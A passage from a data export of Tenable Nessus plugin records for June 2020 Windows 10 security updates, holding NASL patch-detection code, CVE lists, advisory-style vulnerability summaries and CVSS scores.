\"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561616\");\n script_xref(name:\"MSFT\", value:\"MS20-4561616\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. 
An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. 
(CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. 
An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. 
In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282,\n CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. 
An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. 
The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\");\n # https://support.microsoft.com/en-us/help/4561616/windows-10-update-kb4561616\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0526efa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561616.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561616'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561616])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2023-05-18T15:01:26", "description": "The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. 
(CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
(CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302, CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. 
(CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)

* An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory. (CVE-2020-1305)
* A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret, allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash. (CVE-2020-1259)
* A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server. (CVE-2020-1301)
* An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file, leading to an elevated status. (CVE-2020-1197)
* An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory. (CVE-2020-1212)
* An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)
* An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)
* A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)
* An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)
* An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)
* An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)
* An elevation of privilege vulnerability exists when a Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)
* An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)
* An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1237)
* A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)
* An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)
* A spoofing vulnerability exists when Microsoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)
* An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2020-1232)
* A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)
* An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients. An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)
* An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1258)

**KB4561602: Windows 10 Version 1709 June 2020 Security Update** (Nessus plugin 137255, SMB_NT_MS20_JUN_4561602.NASL; published 2020-06-09, modified 2023-03-06; https://www.tenable.com/plugins/nessus/137255)
Solution: Apply Cumulative Update KB4561602 (see https://support.microsoft.com/en-us/help/4561602/windows-10-update-kb4561602). Plugin scoring: CVSS2 base vector AV:N/AC:M/Au:N/C:C/I:C/A:C (scored from CVE-2020-1299); CVSS3 base vector CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (scored from CVE-2020-1317). Exploits are available, exploit framework support is noted, and the plugin flags the issues as exploited by malware. The check is a local one: it reports Windows 10 build 16299 hosts that are missing the June 2020 rollup (KB 4561602).

Next record (last seen 2023-05-18T15:02:30): The remote Windows host is missing security update 4561608. It is, therefore, affected by multiple vulnerabilities:

* An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1270)
* An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)
* An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage. The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)
* A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft. (CVE-2020-1296)
* An information disclosure vulnerability exists when the win32k component improperly provides kernel information. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-1290)
* A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)
* An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system. (CVE-2020-1261, CVE-2020-1263)
* An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)
* An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file, leading to an elevated status. (CVE-2020-1197)
* An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)
